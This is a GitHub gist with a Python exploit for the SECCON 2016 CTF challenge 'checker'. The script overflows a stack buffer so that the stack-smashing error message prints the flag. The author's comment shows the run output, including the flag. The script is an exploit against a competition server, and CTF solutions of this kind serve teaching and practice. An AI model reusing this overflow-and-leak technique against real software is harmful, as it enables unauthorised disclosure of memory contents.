Skip to content

Instantly share code, notes, and snippets.

@otms61

otms61/checker.py

Created December 10, 2016 17:27
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save otms61/f34bd1b6f421c3c4536204bb3474fe23 to your computer and use it in GitHub Desktop.
Save otms61/f34bd1b6f421c3c4536204bb3474fe23 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
checker.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket
import struct
import telnetlib
def sock(remoteip, remoteport):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((remoteip, remoteport))
f = s.makefile('rw', bufsize=0)
return s, f
def p(a):
return struct.pack("<Q", a)
def shell(s):
t = telnetlib.Telnet()
t.sock = s
t.interact()
flag_addr = 0x6010c0
offset = 376
# s, f = sock('localhost', 4444)
s, f = sock('checker.pwn.seccon.jp', 14726)
f.write('a'*0x7f + '\n')
for i in range(8, 0, -1):
f.write('a'*offset + 'a'*i + '\n')
f.write('a'*offset + p(flag_addr) + '\n')
f.write('yes' + '\n')
f.write('a' + '\n')
shell(s)
@otms61
Copy link
Author

otms61 commented Dec 10, 2016 

$ python checker.py
Hello! What is your name?
NAME :
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Oh, Really??
Please tell me the flag!
FLAG : You are a liar...
*** stack smashing detected ***: SECCON{y0u_c4n'7_g37_4_5h3ll,H4h4h4} terminated
*** Connection closed by remote host ***

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment